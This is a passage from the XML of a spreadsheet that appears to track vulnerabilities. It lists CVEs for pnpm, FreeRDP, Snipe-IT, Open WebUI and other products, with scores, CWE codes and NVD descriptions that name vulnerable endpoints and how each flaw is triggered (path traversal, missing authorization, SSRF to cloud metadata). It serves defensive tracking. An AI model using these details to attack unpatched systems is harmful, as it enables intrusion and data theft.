          <t>pnpm is a package manager. Prior to 10.34.5 and from 11.0.0 until 11.11.0, pnpm parses the package name from attacker-controlled pnpm-lock.yaml packages keys with dp.parse(depPath).name and uses it without validation in deps/graph-builder/src/lockfileToDepGraph.ts and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts. The name reaches path.join(modules, pkgName), storeController.importPackage, and pnpm11/lockfile/to-pnp/src/index.ts, allowing package contents to be written outside node_modules when a user runs pnpm install. When dangerouslyAllowAllBuilds or a matching allowBuilds entry permits lifecycle scripts, the escaped package can execute code with the user's privileges. This issue is fixed in versions 10.34.5 and 11.11.0.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82392</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83961</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain limited read and write access. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83961</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84989</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>ntopng is a web-based network traffic monitoring application. In versions 6.7.0 through 6.7.260717, two REST v2 endpoints that manage ntopng's tag/badge feature — `POST /lua/rest/v2/delete/tag/tag.lua` and `POST /lua/rest/v2/edit/tag/tag.lua` — perform no authorization check at all. Any authenticated user, including a non-administrator ("unprivileged") account, can delete or rename any tag in the system, including tags created by an administrator. Version 6.7.260718 contains a fix.</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84989</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85089</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>FreeRDP versions 3.0.0 through 3.30.0 (before 3.31.0) transmit uninitialized heap memory in Save Session Info PDU reserved padding fields. Three PDU writers in libfreerdp/core/info.c (rdp_write_logon_info_v2, rdp_write_logon_info_plain, and rdp_write_logon_info_ex) use Stream_Seek instead of Stream_Zero for reserved pad bytes (up to 576 bytes), leaving previously freed heap contents in the outgoing PDU. Because the send buffer is allocated with malloc (not zeroed), stale heap data — which may include cleartext credentials from prior sessions — can be sent to the receiving peer. FreeRDP-based servers using rdpUpdate::SaveSessionInfo and freerdp-proxy (which forwards these PDUs) are affected, allowing disclosure of server/proxy process memory to a downstream client.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85089</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86204</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to limit JSON payload size in ModalFormResponsePacket handling, allowing authenticated players to cause denial of service. Attackers can send modal form response packets with massive JSON arrays to exhaust server memory and CPU resources, rendering the server unresponsive.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86204</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M621" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R621"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S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87821</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard through 1.3.1 contains a server-side request forgery vulnerability in the POST /api/admin/builder/markdown/fetch endpoint that allows any authenticated user to fetch arbitrary URLs and read the response body. Attackers can read internal HTTP services and cloud metadata including IAM credentials by supplying malicious URLs without host validation or redirect restrictions.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87821</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54467</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>On the Trusted Firmware-M (TF-M) 2 through 2.3.0 platform before 00d1b3e, mailbox initialization on PSOC64 and RP2350 accepts a non-secure, unvalidated, supplied pointer.</t>
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54467</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56711</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr"/>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
